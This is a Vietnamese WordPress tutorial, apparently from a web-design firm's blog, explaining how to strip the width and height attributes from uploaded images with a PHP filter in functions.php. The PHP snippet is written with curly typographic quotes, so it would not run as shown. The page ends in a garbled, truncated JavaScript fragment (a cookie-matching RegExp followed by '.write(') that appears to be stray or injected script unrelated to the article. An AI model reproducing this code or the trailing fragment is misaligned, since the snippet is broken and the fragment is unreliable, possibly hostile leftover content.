Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > Website Marketing > Gỡ bỏ thuộc tính “width” và “height” của ảnh trong WordPress

Gỡ bỏ thuộc tính “width” và “height” của ảnh trong WordPress

Nếu bạn upload ảnh thông qua trình upload của WordPress để chèn ảnh vào bài viết, WordPress sẽ tự động sinh ra  thuộc tính “width” và “height” của ảnh trong thẻ html <img>, chẳng hạn như:

[html]
<img src="đường_dẫn_ảnh.jpg" width="123" height="456" class="aligncenter size-full" alt="" title="">
[/html]

Trong hầu hết các trường hợp, điều này chẳng có ảnh hưởng gì đến website của bạn. Tuy nhiên, nếu bạn đang sử dụng một theme WordPress có hỗ trợ responsive,  thuộc tính “width” và “height” sẽ là một rào cản lớn mà bạn cần thoát khỏi.

Gỡ bỏ thuộc tính "width" và "height" của ảnh trong WordPress

Bạn có thể loại bỏ thuộc tính “width” và “height” của ảnh trong khi upload và chèn vào bài viết bằng các bước như sau:

1. Mở file functions.php trong theme.

2. Copy và paste vào đoạn code sau:

[php]
add_filter( ‘post_thumbnail_html’, ‘remove_width_attribute’, 10 );
add_filter( ‘image_send_to_editor’, ‘remove_width_attribute’, 10 );

function remove_width_attribute( $html ) {
$html = preg_replace( ‘/(width|height)=\"\d*\"\s/’, "", $html );
return $html;
}
[/php]

3. Lưu lại những thay đổi.

Chỉ với một thủ thuật WordPress nho nhỏ bạn đã có thể loại bỏ được thuộc tính “width” và “height” trong khi upload ảnh và chèn chúng vào bài viết thông qua trình upload của WordPress .

Thanks for reading! (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘